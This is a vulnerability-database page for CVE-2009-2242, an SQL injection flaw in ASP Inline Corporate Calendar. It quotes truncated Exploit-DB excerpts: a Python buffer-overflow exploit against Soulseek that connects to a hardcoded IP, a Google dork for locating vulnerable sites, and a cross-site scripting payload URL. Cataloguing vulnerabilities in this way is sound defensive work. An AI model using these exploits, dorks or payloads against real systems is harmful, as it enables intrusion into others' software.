CVE-2009-2242
published 2009-06-27CVE-2009-2242: SQL injection vulnerability in active_appointments.asp in ASP Inline Corporate Calendar allows remote attackers to execute arbitrary SQL commands via the order…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.91%
55.6th percentile
SQL injection vulnerability in active_appointments.asp in ASP Inline Corporate Calendar allows remote attackers to execute arbitrary SQL commands via the order parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Soulseek 157 NS - Remote Buffer Overflow (SEH)
exploitdb·2009-05-26
CVE-2009-1830 Soulseek 157 NS - Remote Buffer Overflow (SEH)
Soulseek 157 NS - Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
#[x] Bug :Soulseek 157 NS Remote Seh Overwrite Exploit
#[x] Credits & poc from : http://www.milw0rm.com/exploits/8777
#[x] Tested on : Windows Xp (sp3), Soulseek 157 NS 12d
#[x] The exploit attacks the user :"test4321"
import struct
import sys, socket
from time import *
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch
request = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00"
request += "testt4321" # username
request += "\x08\x00\x00\x00"
request += "12345678" # password
request += "\xb5\x00\x00\x00\x20\x00\x00\x00"
request += "\x38\x65\x39\x31\x66\x37\x33\x30\x35\x35\x37\x31\x32\x35\x64\x37"
request += "\x34\x39\x32\x34\x62\x64\x66\x35\x6
Exploit-DB
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
exploitdb·2009-05-21
CVE-2009-2243 asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting
---
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : ASP Talk
[+] Exploit Type : Multiple Exploits (SQL/CSS)
[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
1)Cross site scripting :
http://[website]/[script]/search.asp?keyword=alert('bl@ckbe@rd');&Searc
No writeups or analysis indexed.
http://secunia.com/advisories/35187http://www.exploit-db.com/exploits/8756http://www.securityfocus.com/bid/35054https://exchange.xforce.ibmcloud.com/vulnerabilities/50667http://secunia.com/advisories/35187http://www.exploit-db.com/exploits/8756http://www.securityfocus.com/bid/35054https://exchange.xforce.ibmcloud.com/vulnerabilities/50667
2009-06-27
Published